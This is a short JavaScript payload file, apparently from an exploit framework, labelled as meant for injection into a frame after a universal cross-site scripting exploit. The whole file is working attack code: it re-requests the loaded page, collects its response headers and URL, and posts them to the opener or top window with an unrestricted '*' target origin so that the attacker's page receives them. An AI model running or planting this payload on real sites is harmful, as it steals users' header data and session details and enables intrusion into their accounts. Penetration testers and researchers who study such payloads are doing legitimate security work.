data/exploits/uxss/steal_headers.js
/* steal_headers.js: can be injected into a frame/window after a UXSS */
/* exploit to steal the response headers of the loaded URL. */
/* send an XHR request to our current page */
var x = new XMLHttpRequest;
x.open('GET', window.location.href, true);
x.onreadystatechange = function() {
/* when the XHR request is complete, grab the headers and send them back */
if (x.readyState == 2) {
(opener||top).postMessage(JSON.stringify({
headers: x.getAllResponseHeaders(),
url: window.location.href,
send: true
}), '*');
}
};
x.send();